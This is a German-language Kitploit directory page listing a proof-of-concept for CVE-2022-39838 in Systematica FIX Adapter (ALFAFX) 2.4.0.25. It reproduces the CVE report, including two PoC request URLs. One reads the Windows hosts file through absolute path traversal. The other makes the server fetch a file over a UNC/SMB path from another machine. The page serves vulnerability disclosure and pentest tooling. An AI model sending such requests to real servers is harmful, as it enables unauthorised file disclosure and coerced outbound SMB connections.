Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-39838 — Proof-of-Concept-Exploit für CVE-2022-39838, der Remote File Inclusion und Absolute Path Traversal in Systematica FIX Adapter (ALFAFX) 2.4.0.25 über HTTP-Anfragen demonstriert. | Kitploit
Tools/GitHubGitHub/jet-pentest/cve-2022-39838
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHubjet-pentest/cve-2022-39838

CVE-2022-39838

Proof-of-Concept-Exploit für CVE-2022-39838, der Remote File Inclusion und Absolute Path Traversal in Systematica FIX Adapter (ALFAFX) 2.4.0.25 über HTTP-Anfragen demonstriert.

Repository anzeigen
1vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-39838

[Vorgeschlagene Beschreibung]

Systematica FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 ermöglicht das Einbinden entfernter Dateien über einen UNC-Pfad sowie absolute Pfadnavigation zu lokalen Pfaden.

[Zusätzliche Informationen]

PoC:

http://192.168.88.11:8888/info?page=logfile&file=C:\Windows\System32\drivers\etc\hosts

http://192.168.88.11:8888/info?page=logfile&file=\\192.168.88.100\rfi\test.txt

[Schwachstellentyp]

Falsche Zugriffskontrolle

[Anbieter des Produkts]

Systematica

[Betroffene Produktcodebasis]

Systematica FIX Adapter (ALFAFX) - 2.4.0.25 (Build 13/09/2017)

[Angriffstyp]

Remote

[Auswirkung Informationsoffenlegung]

true

[Angriffsvektoren]

Ein entfernter Benutzer kann über einen absoluten Pfad auf beliebige Dateien im Betriebssystem zugreifen. Zudem kann ein entfernter Benutzer den anfälligen Server zwingen, eine Datei von einem anderen Rechner über SMB anzufordern.

[Entdecker]

Ivashchenko Sergey (Jet Infosystems, jet.su)

[Referenz]

http://systematicalpha.com/company

Tool herunterladen